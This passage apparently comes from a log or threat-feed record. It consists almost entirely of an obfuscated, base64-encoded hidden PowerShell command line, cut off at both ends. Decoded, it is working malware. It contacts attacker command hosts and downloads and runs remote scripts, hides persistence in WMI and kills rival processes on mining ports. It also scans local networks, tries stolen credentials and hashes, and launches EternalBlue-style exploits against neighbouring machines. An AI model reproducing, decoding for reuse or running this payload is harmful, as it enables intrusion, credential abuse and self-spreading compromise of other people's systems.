B0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB